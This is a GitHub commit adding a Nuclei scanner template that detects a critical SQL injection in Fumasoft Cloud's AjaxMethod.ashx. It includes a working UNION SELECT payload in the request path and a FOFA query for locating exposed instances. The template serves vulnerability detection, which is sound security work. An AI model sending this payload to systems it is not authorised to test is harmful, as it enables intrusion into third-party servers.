Merge pull request #10711 from projectdiscovery/fumasoft-sqli

Create fumasoft-sqli.yaml
patch-11
Dhiyaneshwaran 2024-09-10 11:49:42 +05:30 committed by GitHub
commit 2cdd00602a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: fumasoft-sqli
info:
name: Fumasoft Cloud - SQL Injection
author: ritikchaddha
severity: critical
description: |
There is a SQL injection vulnerability in the AjaxMethod.ashx file of Fumasoft Cloud. Attackers can obtain server permissions through the vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
fofa-query: title="Fumeng Cloud"
tags: fumasoft,sqli
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','{{num}}')),3,32)--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 500